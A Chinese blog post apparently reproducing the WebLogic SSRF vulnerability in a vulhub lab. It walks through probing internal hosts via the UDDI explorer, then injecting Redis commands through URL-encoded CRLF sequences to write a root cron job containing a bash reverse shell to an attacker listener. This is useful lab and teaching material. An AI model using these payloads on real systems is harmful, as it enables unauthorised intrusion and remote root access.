[漏洞复现]Weblogic SSRF漏洞复现

最新推荐文章于 2024-08-10 08:38:11 发布
最新推荐文章于 2024-08-10 08:38:11 发布
阅读量650 收藏 2
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42633229/article/details/117075189
版权

Weblogic SSRF漏洞复现

环境:vulhub/weblogic/ssrf

漏洞点

http://192.168.17.134:7001/uddiexplorer/SearchPublicRegistries.jsp

image-20210118184033204

通过抓包发现:

将此处替换为其他的地址可以有不同的回显。

例如:

http://127.0.0.1:7001

回显:

weblogic.uddi.client.structures.exception.XML_SoapException: The server at http://127.0.0.1:7001 returned a 404 error code (Not Found). Please ensure that your URL is correct, and the web service has deployed without error.

http://127.0.0.2:7001

回显:

weblogic.uddi.client.structures.exception.XML_SoapException: Tried all: '1' addresses, but could not connect over HTTP to server: '127.0.0.1', port: '7002'

docker的weblogi环境地址(redis端口):172.19.0.2:6379

http://172.19.0.2:6379

image-20210118184945568

回显:
weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://172.19.0.2:6379 which did not have a valid SOAP content-type: null.

可以判断此处存在SSRF漏洞。

image-20210118184144708

攻击点:redis数据未授权访问

未授权访问:访问数据库时不需要提供用户名与密码。

也就是说我们可以通过SSRF漏洞访问内网的redis数据库,利用redis数据库实现读写文件操作,然后将计划任务写进/etc/crontab文件,从而实现反弹shell。

通过三条命令将反弹shell脚本写入/etc/crontab:设置监听地址与端口

set 1 "\n\n\n\n* * * * * root bash  -i >& /dev/tcp/192.168.17.129/21 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

然后将这段命令进行url编码:

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.17.129%2F21%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

然后进行拼接url地址,

http://172.19.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.17.129%2F21%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

最后将其拼接到数据包中:

image-20210118194011743

在kali中开启监听:

image-20210118193621612

成功反弹shell。

补充

docker中的redis版本:

查看命令:docker exec -it your-redis-container-name-or-id redis-server -v

image-20210423171202826

wwxxee
关注
专栏目录
weblogic ssrf 漏洞复现
薛定谔嘚喵博客
05-06 636
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
Weblogic-SSRF漏洞复现
jklbnm12的博客
01-14 1179
应为这一阵正好在学习SSRF漏洞,又苦于本人太菜没有挖到SSRF,只能复现… 先贴出很早之前央视网SSRF可窥探内网(Weblogic SSRF案例):https://www.secpulse.com/archives/38967.html Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件 服务端请求伪造(Server-Side Request Forgery),是指Web服务提供从用户指定的URL读取数据并展示功能又未 对用户输
Weblogic SSRF漏洞复现
K_ShenH的博客
06-24 1106
Weblogic SSRF漏洞
WebLogic常见的几种漏洞
最新发布
a96482的博客
08-10 1339
漏洞存在于wls9-async组件,该组件为异步通讯服务,攻击者可以在/_async/AsyncResponseService路径下传入恶意的xml格式的数据,传入的数据在服务器端反序列化时,执行其中的恶意代码,实现远程命令执行,攻击者可以进而获得整台服务器的权限。这里我们需要访问一个任意上传jsp文件漏洞功能点的目录位置,扫描目录的时候没有扫出来,但是你上网搜素这个CVE-2018-2894都是可以找到这个目录名字的,/ws_utc/config.do(未授权访问。
Weblogic SSRF漏洞漏洞复现
qq_48744846的博客
04-14 3731
访问http://192.168.43.8:7001/uddiexplorer/,无需登录即可查看 uddiexplorer 应用: SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp,仔细查看发现这里有参数传入的是URL,差不多可以断定就是在这个点存在 SSRF 漏洞了: 在 BurpSuite 下抓包测试该漏洞,查询请求的operator参数可以进行端口探测,当我们输入不同值时可得到...
Weblogic ssrf漏洞复现
wutiangui的博客
11-06 379
Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,如配置防火墙规则避免其他非信任来源的IP访问,就会将Redis服务暴露在公网上;SSRF漏洞就是通过篡改获取资源的请求发送给服务器,但是服务器并没有检测这个请求是否合法的,然后服务器以这个请求中的身份来访问其他服务器的资源。产生的原因:服务器端的验证并没有对其请求获取图片的参数(image=)做出严格的过滤以及限制,导致A网站可以从其他服务器的获取数据。安全的网站应接收请求后,检测请求的合法性。或者使用以下工具探测。
weblogic ssrf漏洞复现
qq_38415434的博客
08-07 350
采用的虚拟机环境为ubuntu16.04,在虚拟机上搭建好docker环境。采用的vulhub来进行复现。 使用git来下载,命令为git clone https://github.com/vulhub/vulhub.git 进入ssrf漏洞中, cd /vulhub/weblogic/ssrf 创建漏洞环境 docker-compose up -d 查看容器 docker ps 虚拟机地...
weblogic-SSRF漏洞复现SSRF原理、利用与防御)
不想当脚本小子的脚本小子
12-28 1524
一、SSRF概念 服务端请求伪造(Server-Side Request Forgery),是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片、文档等等。 首先,我们要对目标网站的架构了解,脑子里要有一个架构图。比如 : A网站,是一个所有人都可以访问的外网网站,B网站是一个他们内部
weblogic ssrf漏洞复现
m0_71635484的博客
03-20 297
weblogic ssrf漏洞复现
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
漏洞复现Weblogic SSRF漏洞复现
Miraitowax
02-22 1172
Weblogic SSRF的漏洞原理,漏洞复现步骤详细总结及剖析
WebLogic SSRF漏洞复现
qq_36567469的博客
04-18 2871
weblogic ssrf漏洞复现
11.Weblogic-SSRF漏洞复现
weixin_30527323的博客
10-09 181
应为这一阵正好在学习SSRF漏洞,又苦于本人太菜没有挖到SSRF,只能复现... 先贴出很早之前央视网SSRF可窥探内网(Weblogic SSRF案例):https://www.secpulse.com/archives/38967.html Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件 服务端请...
Weblogic SSRF漏洞复现(CVE-2014-4210)【vulhub靶场】
m0_55854679的博客
08-09 1561
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
关于Weblogic SSRF漏洞复现
mw_myever的博客
10-19 378
一、漏洞介绍  Weblogic中的这个环境就有点类似这个样子的,就是由于访问目标网站是的参数是url 这时就有可能存在ssrf漏洞,恰好在服务端验证请求时没有对用户请求做出严格的过滤以及限制,导致其可以获取服务器的一定量的数据,并可以实现篡改获取的资源并请求发送给服务器,这里就是篡改了 /etc/crontab下的信息,将反弹shell脚本写入了该目录下,是通过获取服务器的redis服务,通过6379 这个端口实现的。 redis数据库 1、未授权访问在访问redis数据库的时候,不需要提供用户名和密码
复现weblogic漏洞ssrf
08-15
vulhub weblogic ssrf漏洞是指在WebLogic服务器中存在一种安全漏洞,攻击者可以利用该漏洞来发起服务器端请求伪造(SSRF)攻击。攻击者可以利用该漏洞来访问受保护的内部网络资源,或者利用该漏洞来发起其他攻击,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值